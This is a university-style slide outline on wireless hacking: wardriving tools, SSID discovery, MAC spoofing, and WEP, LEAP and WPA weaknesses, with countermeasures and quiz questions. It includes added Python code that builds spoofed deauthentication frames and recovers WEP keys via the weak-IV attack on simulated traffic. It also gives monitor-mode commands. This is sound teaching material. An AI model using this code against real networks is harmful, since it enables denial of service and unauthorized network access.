Chapter 8 Wireless Hacking Last modified 3-27-09.
Equipment

Windows vs. Linux
Windows
– Wireless NIC drivers are easy to get
– Wireless hacking tools are few and weak, unless you pay for AirPcap devices (link Ch 819) or OmniPeek
Linux
– Wireless NIC drivers are hard to get and install
– Wireless hacking tools are much better
OmniPeek
WildPackets now packages AiroPeek and EtherPeek together into OmniPeek
A Windows-based sniffer for wireless and wired LANs
Only supports a few wireless NICs
– See links Ch 801, Ch 802
Prism2 Chipsets
For Linux, the three best chipsets to use are Orinoco, Prism2.x/3, and Cisco
– Links Ch 803, 804, 805
Antennas
An omnidirectional antenna sends and receives in all directions
Directional antennas focus the waves in one direction
– The Cantenna (pictured in the original slide) is a directional antenna
Stacked Antennas
Quad stacked antenna
– Four omnidirectional antennas combined to focus the beam away from the vertical
– Beamwidth: 360° horizontal, 15° vertical
– Can reach half a mile
– Link Ch 806
WISPer
Uses "multi-polarization" to send through trees and other obstructions
– Link Ch 807
Global Positioning System (GPS)
Locates you using signals from a set of satellites
Works with war-driving software to create a map of access points
– Link Ch 808
Pinpoint your Location with Wi-Fi (not in book)
Skyhook uses wardriving to build a database of the locations of many Wi-Fi access points
Can locate any portable Wi-Fi device
An alternative to GPS
– Link Ch 809
iPhone
The iPhone combines GPS, Wi-Fi, and cell tower location technology to locate you
– Link Ch 820
You can wardrive with an Android phone and Wifiscan
– Links Ch 821-823
War-Driving Software

Terms
Service Set Identifier (SSID)
– An identifier to distinguish one access point (or network) from another
Initialization Vector (IV)
– Part of a Wired Equivalent Privacy (WEP) packet: a 24-bit value sent in the clear
– Prepended to the shared secret key to form the per-packet RC4 key that encrypts the packet's data
NetStumbler
Very popular Windows-based war-driving application
Analyzes the 802.11 header and IV fields of the wireless packet to find:
– SSID
– MAC address
– WEP usage and WEP key length (40- or 104-bit secret key, marketed as 64- or 128-bit)
– Signal range
– Access point vendor
How NetStumbler Works
NetStumbler broadcasts 802.11 Probe Requests with an empty (wildcard) SSID
All access points in the area send 802.11 Probe Responses containing network configuration information, such as their SSID and WEP status
It also uses a GPS to mark the positions of networks it finds
– Link Ch 810
NetStumbler Screen (screenshot in original slide)
NetStumbler Countermeasures
NetStumbler relies on the broadcast Probe Request
Wireless equipment vendors usually offer an option to stop the access point from answering broadcast Probe Requests, which effectively blinds NetStumbler
– But it doesn't blind Kismet, which listens passively for Beacons and client traffic instead of probing
Kismet
Linux and BSD-based wireless sniffer
Allows you to track wireless access points and their GPS locations like NetStumbler
Sniffs for 802.11 packets, such as Beacons and Association Requests
– Gathers IP addresses and Cisco Discovery Protocol (CDP) names when it can
Kismet Countermeasures
– There's not much you can do to stop Kismet from finding your network
Kismet Features
Windows version
– Runs on Cygwin, only supports two types of network cards
AirSnort-compatible weak-IV packet logging
Runtime decoding of WEP packets for known networks
Kismet Screenshot (in original slide)
For Kismet, see link Ch 811
Kismet Demo
– Use the Linksys WUSB54G ver 4 NICs
– Boot from the BackTrack 2 CD
– Start, Backtrack, Radio Network Analysis, 80211, All, Kismet
Wardriving
Finding wireless networks with a portable device
– Image from overdrawn.net
Vistumbler
Link Ch 818

Cain (screenshot in original slide)
WiGLE
Collects wardriving data from users
Has over 16 million records
– Link Ch 825
Wireless Scanning and Enumeration
Goal of Scanning and Enumeration
– To determine a method to gain system access
For wireless networks, scanning and enumeration are combined, and happen simultaneously
Wireless Sniffers
Not really any different from wired sniffers
There are the usual issues with drivers, and getting a card into monitor mode
Wireshark WiFi Demo
– Use the Linksys WUSB54G ver 4 NICs
– Boot from the BackTrack 2 CD
– In Konsole (rausb0 is the interface name the Ralink rt2570 driver gives this adapter; bring it up, switch it to monitor mode, then sniff):
ifconfig rausb0 up
iwconfig rausb0 mode monitor
wireshark
iClicker Questions

Question 1 of 3: Which antenna sends power most tightly focused in a single direction?
(Choices A, B, C, and D are antenna pictures in the original slide)

Question 2 of 3: Which tool runs only on Linux?
A. NetStumbler  B. Kismet  C. Vistumbler  D. Cain  E. Wireshark

Question 3 of 3: Which tool gives you the most complete information about every Wi-Fi frame sent?
A. NetStumbler  B. Kismet  C. Vistumbler  D. Cain  E. Wireshark
Identifying Wireless Network Defenses

SSID
SSID can be found from any of these frames
– Beacons
Sent continually by the access point (when SSID broadcasting is disabled the Beacon is still sent, but with an empty SSID field)
– Probe Requests
Sent by client systems wishing to connect
– Probe Responses
Response to a Probe Request
– Association and Reassociation Requests
Made by the client when joining or rejoining the network
If SSID broadcasting is off, send a spoofed deauthentication frame to a connected client to force a reassociation; the client's Probe and Association Requests carry the SSID in the clear
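Added example (not from the book or the slides): a small Python parser for the management frames listed above, run over constructed Beacon, Probe Request and Association Request frames, plus the spoofed Deauthentication frame used to force the reassociation. The AP and client MAC addresses and the SSID "lab-ap" are made up for the demonstration. Reading Beacons passively, as this code does, is also why Kismet still sees an access point that ignores NetStumbler's broadcast probes, and the same deauthentication frame is the DoS primitive discussed later under Unauthenticated Management Frames.

```python
"""Extracting the SSID from 802.11 management frames, and building the spoofed
Deauthentication frame that forces a client to reassociate.  Added example for
this section; the access point, client and SSID below are constructed, not
captured from any real network."""
import struct

# Frame-control byte 0 = (subtype << 4) | (type << 2) | version; type 0 = management
ASSOC_REQ, REASSOC_REQ, PROBE_REQ, PROBE_RESP, BEACON, DEAUTH = 0x0, 0x2, 0x4, 0x5, 0x8, 0xC
SUBTYPE_NAME = {ASSOC_REQ: "Association Request", REASSOC_REQ: "Reassociation Request",
                PROBE_REQ: "Probe Request", PROBE_RESP: "Probe Response", BEACON: "Beacon"}
# Bytes of fixed fields between the 24-byte MAC header and the tagged parameters
FIXED_LEN = {ASSOC_REQ: 4, REASSOC_REQ: 10, PROBE_REQ: 0, PROBE_RESP: 12, BEACON: 12}
MAC_HDR_LEN = 24          # FC(2) duration(2) addr1(6) addr2(6) addr3(6) seq-ctl(2)
BROADCAST = b"\xff" * 6


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def parse_ssid(frame):
    """Return (frame kind, transmitter MAC, SSID, hidden?) for a management frame.
    The SSID is tagged element 0; a zero-length or all-NUL SSID means the AP
    has 'SSID broadcasting' turned off, so the Beacon alone does not name it."""
    fc0 = frame[0]
    if (fc0 >> 2) & 0x3 != 0:
        raise ValueError("not a management frame")
    subtype = fc0 >> 4
    if subtype not in FIXED_LEN:
        raise ValueError(f"subtype {subtype:#x} carries no SSID element")
    transmitter = mac_str(frame[10:16])          # addr2 is the transmitter
    pos = MAC_HDR_LEN + FIXED_LEN[subtype]
    while pos + 2 <= len(frame):                 # walk the tag/length/value list
        tag, length = frame[pos], frame[pos + 1]
        value = frame[pos + 2:pos + 2 + length]
        if tag == 0:
            hidden = length == 0 or set(value) == {0}
            ssid = "" if hidden else value.decode("utf-8", "replace")
            return SUBTYPE_NAME[subtype], transmitter, ssid, hidden
        pos += 2 + length
    raise ValueError("no SSID element in frame")


def build_mgmt(subtype, dst, src, bssid, body, seq=0):
    fc = bytes([subtype << 4, 0])                # management type, no flags
    return fc + struct.pack("<H", 0) + dst + src + bssid + struct.pack("<H", seq << 4) + body


def ssid_ie(ssid):
    return bytes([0, len(ssid)]) + ssid


def build_deauth(client, ap, reason=7):
    """Deauthentication frame claiming to come from the AP.  Management frames
    carry no authentication in 802.11 (before 802.11w), so the client obeys it
    and then reauthenticates, exposing the SSID; sent in a loop it is a DoS.
    Reason 7 = class 3 frame received from a nonassociated station."""
    return build_mgmt(DEAUTH, client, ap, ap, struct.pack("<H", reason))


# Constructed sample traffic (not from the page): an AP with SSID broadcast off
AP = bytes.fromhex("02000000aa01")
CLIENT = bytes.fromhex("02000000bb02")
SSID = b"lab-ap"
RATES_IE = bytes([1, 1, 0x82])                   # supported rates: 1 Mbps (basic)


def sample_frames():
    beacon_fixed = struct.pack("<QHH", 0, 100, 0x0411)    # timestamp, interval, capability
    hidden_beacon = build_mgmt(BEACON, BROADCAST, AP, AP, beacon_fixed + ssid_ie(b"") + RATES_IE)
    probe_req = build_mgmt(PROBE_REQ, BROADCAST, CLIENT, BROADCAST, ssid_ie(SSID) + RATES_IE)
    assoc_req = build_mgmt(ASSOC_REQ, AP, CLIENT, AP, struct.pack("<HH", 0x0411, 10) + ssid_ie(SSID))
    return [hidden_beacon, probe_req, assoc_req]


if __name__ == "__main__":
    for f in sample_frames():
        kind, src, ssid, hidden = parse_ssid(f)
        print(f"{kind:22} from {src}: SSID={ssid!r}{' (hidden)' if hidden else ''}")
    print("deauth frame:", build_deauth(CLIENT, AP).hex())
```

The hidden Beacon yields an empty SSID, while the client's own Probe Request and Association Request name the network; in a live test the parser would be fed frames from a monitor-mode interface (for example via Wireshark or Kismet's pcap output) and the deauthentication frame injected with a tool such as wlan_jack.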
MAC Access Control
CCSF uses this technique
Each MAC must be entered into the list of approved addresses
High administrative effort, low security
Attacker can just sniff MACs from clients and spoof them
Gaining Access (Hacking 802.11)

Specifying the SSID
In Windows, just select it from the available wireless networks
– In Vista, right-click the network icon in the taskbar tray and click "Connect to a Network"
– If the SSID is hidden, click "Set up a connection or network" and then click "Manually connect to a wireless network"
Changing your MAC
Bwmachak changes the MAC of Orinoco cards under Windows
SMAC is easy
– link Ch 812
Device Manager
Many Wi-Fi cards allow you to change the MAC in Windows' Device Manager
Attacks Against the WEP Algorithm
Brute-forcing the keyspace is slow (weeks even for a 40-bit key on 2009 hardware) and infeasible for 104-bit keys
Collect Initialization Vectors, which are sent in the clear, and correlate them with the first encrypted byte
– The first plaintext byte of every WEP data frame is the known LLC/SNAP value 0xAA, so keystream byte 0 is exposed for every captured IV
– For certain "weak" IVs (the Fluhrer-Mantin-Shamir attack) that byte leaks one key byte with about 5% probability; a few hundred weak IVs per key byte recover the whole key without any brute force
– Later attacks (KoreK, and the PTW attack used by aircrack-ng) use many more IV classes or every IV, so they need only tens of thousands of captured frames
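Added example (not from the book or the slides): a Python simulation of the weak-IV attack. RC4 and WEP's IV-prefixed keying are implemented as specified; the 40-bit key, the traffic, and the convenient fact that every simulated frame uses a weak IV are constructed so the attack finishes instantly. The first plaintext byte is the known LLC/SNAP 0xAA, so keystream byte 0 falls out of every frame; for IVs of the form (B+3, 255, X) the key schedule is in a "resolved" state and that byte leaks key byte B about one time in twenty, so 256 such IVs normally give the right value a clear majority of the votes.

```python
"""WEP weak-IV key recovery (the Fluhrer-Mantin-Shamir attack that AirSnort
implemented).  Added example for this section: the access point, its key and
its traffic are simulated below, nothing is sniffed."""
from collections import Counter


def rc4_keystream(key, n):
    S, j = list(range(256)), 0
    for i in range(256):                       # key-scheduling algorithm (KSA)
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(n):                         # pseudo-random generation (PRGA)
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) % 256])
    return bytes(out)


def rc4(key, data):
    return bytes(a ^ b for a, b in zip(data, rc4_keystream(key, len(data))))


SNAP_FIRST_BYTE = 0xAA   # every WEP data frame starts with the LLC/SNAP header AA AA 03 ...


def wep_encrypt(secret_key, iv, plaintext):
    """Per-packet RC4 key = IV || secret key; the 3-byte IV is sent in the clear."""
    return iv + rc4(iv + secret_key, plaintext)


def first_keystream_byte(frame):
    """Known first plaintext byte (0xAA) exposes keystream byte 0 of every frame."""
    return frame[3] ^ SNAP_FIRST_BYTE


def fms_vote(iv, known_key, ks0):
    """Run the KSA only as far as the known prefix (IV + recovered key bytes).
    If the state is 'resolved' (S[1] < I and S[1] + S[S[1]] == I), keystream
    byte 0 equals the state byte that the next key byte swaps into place with
    probability ~5%, so it leaks that key byte.  Return the implied key byte,
    or None when this IV is not weak for the byte under attack."""
    prefix = iv + known_key
    I = len(prefix)                        # index of the key byte under attack
    S, j = list(range(256)), 0
    for i in range(I):
        j = (j + S[i] + prefix[i]) % 256
        S[i], S[j] = S[j], S[i]
    if S[1] < I and (S[1] + S[S[1]]) % 256 == I:
        return (S.index(ks0) - j - S[I]) % 256
    return None


def recover_key(observations, key_len):
    """observations: (iv, keystream byte 0) pairs.  Recover the key byte by byte,
    letting each weak IV vote; the right value normally leads by a wide margin."""
    key = b""
    for _ in range(key_len):
        votes = Counter()
        for iv, ks0 in observations:
            v = fms_vote(iv, key, ks0)
            if v is not None:
                votes[v] += 1
        if not votes:
            raise ValueError("no weak IVs for key byte %d" % len(key))
        key += bytes([votes.most_common(1)[0][0]])
    return key


def simulate_capture(secret_key):
    """Constructed traffic: one frame for each FMS weak IV (B+3, 255, X), the
    class AirSnort waited for while logging 'interesting' packets."""
    payload = bytes([0xAA, 0xAA, 0x03, 0, 0, 0, 0x08, 0x00]) + b"hello"
    observations = []
    for b in range(len(secret_key)):
        for x in range(256):
            iv = bytes([b + 3, 255, x])
            frame = wep_encrypt(secret_key, iv, payload)
            observations.append((iv, first_keystream_byte(frame)))
    return observations


if __name__ == "__main__":
    key = bytes.fromhex("1f2e3d4c5b")         # constructed 40-bit WEP key
    guess = recover_key(simulate_capture(key), len(key))
    print("true key", key.hex(), "recovered", guess.hex(),
          "OK" if guess == key else "a byte lost the vote; real attacks gather more weak IVs")
```

Real captures contain weak IVs only occasionally (each class is 256 of the 16.7 million possible IVs), which is why AirSnort needed millions of frames and why the PTW attack, which extracts information from every IV, replaced FMS in aircrack-ng.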
Tools that Exploit WEP Weaknesses
AirSnort
WLAN-Tools
DWEPCrack
WEPAttack
– Cracks using the weak-IV flaw
Best countermeasure: use WPA (WPA2 with AES-CCMP where the hardware supports it)
Hotspotter
Hotspotter, like SSLstrip, silently replaces a secure Wi-Fi connection with an insecure one: it listens for a client's Probe Requests for a remembered network name and answers as an open access point with that SSID
Works because Windows allows it, apparently happy to accept an insecure network as part of the same WLAN
– Link Ch 824
Lightweight Extensible Authentication Protocol (LEAP)

What is LEAP?
A proprietary protocol from Cisco Systems developed in 2000 to address the security weaknesses common in WEP
LEAP is an 802.1X scheme using a RADIUS server
As of 2004, 46% of IT executives in the enterprise said that they used LEAP in their organizations
The Weakness of LEAP
LEAP is fundamentally weak because it provides zero resistance to offline dictionary attacks
It relies solely on MS-CHAPv2 (Microsoft Challenge Handshake Authentication Protocol version 2) to protect the user credentials used for wireless LAN authentication

MS-CHAPv2
MS-CHAPv2 is notoriously weak because
– It does not use a salt in its NT hashes (the NT hash is just MD4 of the password)
– The 16-byte NT hash is split into three 7-byte DES keys; the third key holds only the last 2 bytes of the hash padded with zeros, so 2^16 DES trials recover those two bytes and prune the dictionary to passwords whose hash ends the same way
– Sends usernames in clear text
– The challenge and the response both cross the air unencrypted, so one sniffed exchange is enough for an offline attack
Because of this, offline dictionary and brute-force attacks can be made much more efficient by a very large (4 gigabytes) database of likely passwords with pre-calculated hashes
– Rainbow tables (asleap's genkeys builds such a precomputed table, indexed by those last two hash bytes)
Cisco's Defense
LEAP is secure if the passwords are long and complex
– 10 characters long with random upper case, lower case, numeric, and special characters
The vast majority of passwords in most organizations do not meet these stringent requirements
– Can be cracked in a few days or even a few minutes
For more info about LEAP, see link Ch 813
LEAP Attacks

Anwrap
Performs a dictionary attack on LEAP
Written in Perl, easy to use

Asleap
Grabs and decrypts weak LEAP passwords from Cisco wireless access points and corresponding wireless cards
Integrated with Air-Jack to knock authenticated wireless users off targeted wireless networks
– When the user reauthenticates, the challenge/response is sniffed and the password cracked with Asleap
Countermeasures for LEAP
Enforce strong passwords
Continuously audit the services to make sure people don't use poor passwords
Better: migrate to an EAP type that is not open to offline dictionary attack (Cisco's own replacement is EAP-FAST; PEAP or EAP-TLS also work)
WPA
WPA is strong
No practical attack recovers the key from the protocol itself (WPA-TKIP has a known weakness that allows limited packet forgery, one more reason to prefer WPA2 with AES-CCMP)
However, if you use a weak Pre-Shared Key, it can be found with an offline dictionary attack against a single captured four-way handshake
– The PSK is derived from the passphrase and the SSID (PBKDF2, 4096 iterations), so precomputed tables work for one SSID only; the attacker tests each candidate by recomputing the handshake MIC
Tool: Aircrack-ng
Denial of Service (DoS) Attacks
Radio Interference
– 802.11b and 11g use the 2.4 GHz ISM band, which is extremely crowded at the moment; 802.11a uses the 5 GHz band, which is less crowded but just as easy to jam deliberately
Unauthenticated Management Frames
– An attacker can spoof a deauthentication frame that looks like it came from the access point
– wlan_jack in the Air-Jack suite does this
– Management frames carry no authentication in 802.11 as originally specified; the 802.11w amendment (protected management frames) addresses this but is not universally deployed
iClicker Questions

Question 1 of 4: Which Cisco proprietary wireless security protocol is vulnerable, but still widely used?
A. WPA2  B. WPA  C. LEAP  D. WEP  E. MAC Address Filtering

Question 2 of 4: Which wireless security protocol is the weakest, vulnerable to a trivial sniffing attack?
A. WPA2  B. WPA  C. LEAP  D. WEP  E. MAC Address Filtering

Question 3 of 4: Which wireless security protocol is vulnerable to DoS via deauthentication frame injection?
A. WPA2  B. WPA  C. LEAP  D. WEP  E. All of the above

Question 4 of 4: Which wireless security protocol requires the most administrative effort to implement and maintain?
A. WPA2  B. WPA  C. LEAP  D. WEP  E. MAC Address Filtering